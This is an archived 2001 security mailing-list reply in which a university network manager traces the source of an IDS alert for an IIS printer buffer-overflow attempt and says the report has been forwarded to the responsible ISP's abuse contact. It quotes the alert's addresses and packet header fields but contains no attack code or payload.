Re: Attempted WEB-IIS printer attempt Buffer Overflow

From: Doug Nelson (nelsonat_private)
Date: Tue Jul 17 2001 - 08:15:05 PDT


    > Date of Attack:  Jul 14, 2001
    > Time of Attack: 09:00:38 am EDT
    > 
    > Source of Attack: 
    > IP Address: 198.109.163.170
    > 
    > Destination of Attack:
    > IP Address: 216.18.61.98
    > Port: 80
    > Protocol: TCP
    > 
    > 
    > Description: 
    > - Intruder attempted to access the printer isapi filter.
    > 
    > Link: http://www.whitehats.com/info/IDS533
    
    The IP address in question belongs to AT&T Broadband and Information
    Services in East Lansing.  I have passed your message on to
    "abuseat_private" for further action.
    
    Doug Nelson			nelsonat_private
    Network Manager			Ph: (517) 353-2980
    Computer Laboratory
    Michigan State University
    
    
    > [**] WEB-IIS printer attempt [**]
    > Jul 14,01 09:00:38am    198.109.163.170:3265 -> 216.18.61.98:80
    > TTL: 46 TOS: 0x0        ID:1675
    > ***AP*** Seq: 3550615295 Ack: 2075228853 Win: 32120
    > 
    > 
    > 
    > ---
    > Jason Robertson                
    > Network Analyst            
    > jasonat_private    
    > http://www.astroadvice.com      
    > 
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 10:14:22 PDT